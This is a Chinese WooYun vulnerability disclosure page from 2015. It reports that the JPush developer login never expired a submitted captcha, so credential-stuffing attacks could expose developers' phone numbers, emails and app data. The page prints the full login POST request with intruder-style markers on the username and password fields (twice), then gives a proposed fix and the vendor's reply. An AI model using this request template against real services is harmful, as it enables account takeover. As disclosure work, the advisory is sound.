当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141026

漏洞标题:极光推送撞库泄露开发者手机邮箱及应用信息

相关厂商:jpush.cn

漏洞作者: just_joker

提交时间:2015-09-14 10:44

修复时间:2015-10-31 15:18

公开时间:2015-10-31 15:18

漏洞类型:账户体系控制不严

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-14: 细节已通知厂商并且等待厂商处理中
2015-09-16: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向核心白帽子及相关领域专家公开
2015-10-06: 细节向普通白帽子公开
2015-10-16: 细节向实习白帽子公开
2015-10-31: 细节向公众公开

简要描述:

RT,验证码这个功能算是白做了。

详细说明:

用户登录

j1.png


POST /common/accounts/signin/ajax HTTP/1.1
Host: www.jpush.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.jpush.cn/
Content-Length: 58
Cookie: JSESSIONID=A1BDB5B3925C73B7838447638BD238CA-n1; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh; Hm_lvt_aeb15141078c6794b8c872e235d3b8dd=1442196759; Hm_lpvt_aeb15141078c6794b8c872e235d3b8dd=1442196759
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=§e324324§&password=§3213213§&captcha=9543&remember=on


撞,只做测试,

j2.png


登录验证一下

j3.png


漏洞证明:

用户登录

j1.png


POST /common/accounts/signin/ajax HTTP/1.1
Host: www.jpush.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.jpush.cn/
Content-Length: 58
Cookie: JSESSIONID=A1BDB5B3925C73B7838447638BD238CA-n1; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh; Hm_lvt_aeb15141078c6794b8c872e235d3b8dd=1442196759; Hm_lpvt_aeb15141078c6794b8c872e235d3b8dd=1442196759
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=§e324324§&password=§3213213§&captcha=9543&remember=on


撞,只做测试,

j2.png


登录验证一下

j3.png


修复方案:

验证码提交一次后要过期啊,也不要寄希望在客户端发起新的验证码请求,服务端接受到提交
后,session就应该立即失效。

版权声明:转载请注明来源 just_joker@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-09-16 15:17

厂商回复:

感谢指出漏洞,后续JPush会修改验证规则,增加二次验证的方式。

最新状态:

暂无


漏洞评价:

评论